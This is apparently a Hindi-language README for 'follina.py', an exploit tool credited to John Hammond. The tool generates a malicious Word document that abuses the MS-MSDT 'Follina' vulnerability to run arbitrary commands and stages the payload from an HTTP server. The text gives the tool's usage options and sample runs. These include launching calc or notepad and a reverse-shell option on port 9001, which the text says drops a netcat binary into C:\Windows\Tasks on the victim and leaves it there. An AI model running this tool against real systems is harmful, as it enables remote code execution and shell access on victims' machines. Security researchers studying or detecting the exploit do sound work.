
एक दुर्भावनापूर्ण Microsoft Word दस्तावेज़ उत्पन्न करता है जो MS-MSDT 'Follina' भेद्यता का शोषण करके मनमाने कमांड निष्पादित करता है या HTTP सर्वर के माध्यम से पेलोड स्टेज करता है।
जॉन हैमंड | 30 मई, 2022
एक दुर्भावनापूर्ण Microsoft Word दस्तावेज़ के साथ "Follina" MS-MSDT आक्रमण बनाएं और HTTP सर्वर के साथ पेलोड को स्टेज करें।

usage: follina.py [-h] [--command COMMAND] [--output OUTPUT] [--interface INTERFACE] [--port PORT]
options:
-h, --help show this help message and exit
--command COMMAND, -c COMMAND
command to run on the target (default: calc)
--output OUTPUT, -o OUTPUT
output maldoc file (default: ./follina.doc)
--interface INTERFACE, -i INTERFACE
network interface or IP address to host the HTTP server (default: eth0)
--port PORT, -p PORT port to serve the HTTP server (default: 8000)
calc.exe खोलें:
$ python3 follina.py
[+] copied staging doc /tmp/9mcvbrwo
[+] created maldoc ./follina.doc
[+] serving html payload on :8000
notepad.exe खोलें:
$ python3 follina.py -c "notepad"
पोर्ट 9001 पर रिवर्स शेल प्राप्त करें। ध्यान दें, यह एक netcat बाइनरी को पीड़ित पर डाउनलोड करता है और इसे C:\Windows\Tasks में रखता है। यह बाइनरी को साफ नहीं करता है। जब तक AV अक्षम न हो, यह एंटीवायरस डिटेक्शन को ट्रिगर करेगा।
$ python3 follina.py -r 9001
